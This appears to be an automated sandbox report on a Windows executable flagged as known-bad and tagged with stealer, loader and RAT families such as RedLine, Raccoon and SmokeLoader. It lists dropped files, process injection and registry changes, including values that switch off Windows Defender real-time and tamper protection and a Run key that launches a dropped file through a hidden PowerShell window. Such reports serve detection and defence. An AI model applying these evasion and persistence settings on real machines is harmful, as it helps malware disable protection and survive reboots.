Malware Analysis Report

2025-08-10 21:54

Sample ID 231025-ft9r5sfc61
Target dfd8798cfe88efc66b69d0be9671d323.exe
SHA256 dd4979e886bd46b6a5c618eb78b4525f36d3fa6ea9c6abb14e42ffa177a46ced
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dd4979e886bd46b6a5c618eb78b4525f36d3fa6ea9c6abb14e42ffa177a46ced

Threat Level: Known bad

The file dfd8798cfe88efc66b69d0be9671d323.exe was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat stealer trojan

Amadey

Modifies Windows Defender Real-time Protection settings

SmokeLoader

Glupteba

RedLine

ZGRat

Glupteba payload

Raccoon Stealer payload

Raccoon

Detect ZGRat V1

DcRat

RedLine payload

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Executes dropped EXE

Checks BIOS information in registry

Checks computer location settings

Windows security modification

Loads dropped DLL

Checks installed software on the system

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-25 05:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-25 05:11

Reported

2023-10-25 05:13

Platform

win7-20231023-en

Max time kernel

98s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\90BF.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\90BF.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\90BF.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\90BF.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\90BF.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\90BF.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8DC0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8FB5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\90BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\918B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1AD8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2390.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7068.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7855.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iN14Uw1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\918B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZG494bY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2390.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2390.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1664.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7855.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\90BF.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\90BF.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1AD8.exe'\"" C:\Users\Admin\AppData\Local\Temp\1AD8.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\8D13.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\MyBurn\is-V3CA5.tmp C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-LVA35.tmp C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-6NL1V.tmp C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-R6F7B.tmp C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-B1GQF.tmp C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
File created C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-O55AD.tmp C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-GPHNV.tmp C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-TR7PA.tmp C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-FVDFN.tmp C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe C:\Users\Admin\AppData\Local\Temp\is-3MASL.tmp\is-HEQIH.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\2390.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS5419.tmp\Install.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\90BF.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2028 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2028 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1260 wrote to memory of 2704 N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2704 N/A N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe
PID 1260 wrote to memory of 2632 N/A N/A C:\Users\Admin\AppData\Local\Temp\8DC0.exe
PID 1260 wrote to memory of 2632 N/A N/A C:\Users\Admin\AppData\Local\Temp\8DC0.exe
PID 1260 wrote to memory of 2632 N/A N/A C:\Users\Admin\AppData\Local\Temp\8DC0.exe
PID 1260 wrote to memory of 2632 N/A N/A C:\Users\Admin\AppData\Local\Temp\8DC0.exe
PID 1260 wrote to memory of 2672 N/A N/A C:\Windows\system32\cmd.exe
PID 1260 wrote to memory of 2672 N/A N/A C:\Windows\system32\cmd.exe
PID 1260 wrote to memory of 2672 N/A N/A C:\Windows\system32\cmd.exe
PID 2704 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 2704 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8D13.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe
PID 1260 wrote to memory of 2548 N/A N/A C:\Users\Admin\AppData\Local\Temp\8FB5.exe
PID 1260 wrote to memory of 2548 N/A N/A C:\Users\Admin\AppData\Local\Temp\8FB5.exe
PID 1260 wrote to memory of 2548 N/A N/A C:\Users\Admin\AppData\Local\Temp\8FB5.exe
PID 1260 wrote to memory of 2548 N/A N/A C:\Users\Admin\AppData\Local\Temp\8FB5.exe
PID 1260 wrote to memory of 1900 N/A N/A C:\Users\Admin\AppData\Local\Temp\90BF.exe
PID 1260 wrote to memory of 1900 N/A N/A C:\Users\Admin\AppData\Local\Temp\90BF.exe
PID 1260 wrote to memory of 1900 N/A N/A C:\Users\Admin\AppData\Local\Temp\90BF.exe
PID 1260 wrote to memory of 1900 N/A N/A C:\Users\Admin\AppData\Local\Temp\90BF.exe
PID 2520 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
PID 2520 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe
